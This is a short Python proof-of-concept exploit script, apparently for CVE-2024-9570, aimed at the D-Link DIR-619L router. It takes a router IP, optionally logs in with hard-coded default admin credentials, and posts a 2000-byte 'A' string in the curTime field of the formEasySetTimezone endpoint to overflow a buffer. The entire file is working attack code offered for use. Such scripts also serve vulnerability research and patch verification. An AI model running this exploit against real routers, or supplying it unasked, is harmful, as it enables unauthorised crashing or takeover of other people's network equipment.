CVE-2024-9570_D-Link-DIR-619L-bof.py

import argparse, requests
import sys
import json

if sys.version_info[0] != 3:
    print("Please run the exploit in python3")
    sys.exit(1)

# You can also login with scripts below.
def login():
    login_url = "goform/formLogin"
    url = base_url + "/" + login_url
    print("1. Login: send request to", url)
    login_data = "curTime=1666884522835&FILECODE=a6.jpeg%0D%0A&VERIFICATION_CODE=LSYFZ&login_n=admin&login_pass=YWRtaW4A"
    response = requests.post(url=url, data=login_data, allow_redirects=False)
    print(response.text)


def poc():
    target_url = "goform/formEasySetTimezone"
    print("2. get target_url:", target_url)
    url = base_url + "/" + target_url
    print("3. send request to", url)
    
    # Using a dictionary to hold multiple parameters
    data = {
        "curTime": "A" * 2000,  # Adjust the number according to your needs
    }
    
    json_data = json.dumps(data)
    print("request body:", json_data)
    response = requests.post(url=url, json=data, allow_redirects=False)
    print(response.text)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Run the exploit')
    parser.add_argument('ip', type=str, default=None, help='The Router IP')
    args = parser.parse_args()

    global base_url
    base_url = "http://{}".format(args.ip)

    # login()
    poc()